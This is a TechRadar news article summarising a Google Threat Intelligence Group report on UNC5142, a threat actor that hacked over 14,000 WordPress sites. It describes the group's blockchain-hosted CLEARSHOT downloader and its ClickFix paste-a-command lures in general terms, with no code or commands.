- UNC5142 hacked 14,000+ WordPress sites to distribute malware
- Malware payloads were sourced from the blockchain, increasing resilience and preventing takedowns
- ClickFix tricks tricked users into running malicious commands
More than 14,000 WordPress sites were hacked and used as launching pads for the distribution of malware, Google’s Threat Intelligence Group (GTIG) said in a recent report.
Discussing the campaign in depth, GTIG said it is the work of UNC5142, a relatively new threat actor that emerged in late 2023 and ceased operations in late July 2025.
It is not yet known if the break is temporary, permanent, or if the group has simply switched to different techniques. Given their past success in compromising websites and deploying malware, Google believes the group has just improved its obfuscation techniques and is still operating in the wild.
Blockchain and ClickFix
In the campaign, UNC5142 would “indiscriminately” target vulnerable WordPress sites – those with flawed plugins, theme files, and in some cases – the WordPress database itself.
These sites would get a multi-step JavaScript downloader called CLEARSHOT, which enabled malware distribution. This downloader retrieved the stage two payload from the public blockchain, often using the BNB chain.
The use of blockchain is interesting, the researchers found, as it improves resilience and makes takedowns more difficult:
“The use of blockchain technology for large parts of UNC5142’s infrastructure and operations increases their resilience to detection and takedown efforts,” the report states.
“Network-based protection mechanisms are more difficult to implement for Web3 traffic compared to traditional web traffic due to the lack of use of traditional URLs. Seizure and removal operations are also hindered given the immutability of the blockchain.”
From the public blockchain, the malware would pull a CLEARSHORT landing page from a remote server. This landing page will serve ClickFix social engineering tactics – asking users to copy and paste a command into the Run program on Windows (or the Terminal app on a Mac), which ultimately downloads the malware.
The landing pages were typically hosted on a Cloudflare .dev site, it said, and downloaded in an encrypted format.
Via Hacker News
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, video unboxings, and get regular updates from us on WhatsApp also.
